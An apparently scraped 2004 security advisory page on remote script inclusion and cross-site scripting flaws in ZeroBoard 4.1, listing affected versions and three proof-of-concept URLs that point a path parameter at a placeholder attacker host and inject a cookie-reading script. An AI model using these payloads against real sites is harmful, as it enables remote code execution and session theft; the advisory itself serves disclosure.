exploits , vulnerabilities , articles , ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
| Title |
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities |
| Published |
2004-12-24-12:00AM |
| Updated |
2004-12-24-07:35PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Jeremy Bae is credited with the discovery of these issues. |
| Vulnerable |
Zeroboard Zeroboard 4.1 pl4
Zeroboard Zeroboard 4.1 pl3
Zeroboard Zeroboard 4.1 pl2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 IA32
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0 i386
|
| Not Vulnerable |
|
| Code |
No exploit is required to leverage these issues. The following proof of concepts have been made available:
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/ http://www.example.com/include/write.php?dir=http://[attacker]/ http://www.example.com/check_user_id.php?user_id=<script>alert(document.cookie)</sc ript>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Wed, 16 Dec 2009 19:44:11 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
gftpdaemon office sca deskmail Www.arab_j X11 free india www.unsens SEXY BABY bbs.ltdts. office sca IFILM joomla com zeroboard. zeroboard. sex vdio Apache/2.0 www.znmark Free sex p 200 /compo php-nuke 2 php-nuke a www.indian www.wap.wa Thrsha sex index.php? www.xNxx.c Sex korea. sun solari Play boy office sca news for c ps2 www.taobao Play boy 3230 www.fschmy www.chengs vulnerabil free Sex v Vidio sex openconf www.xNxx.c news+for+C www.janili www.janili Blue chip Indiansexi jayz 200 /compo kdi5
|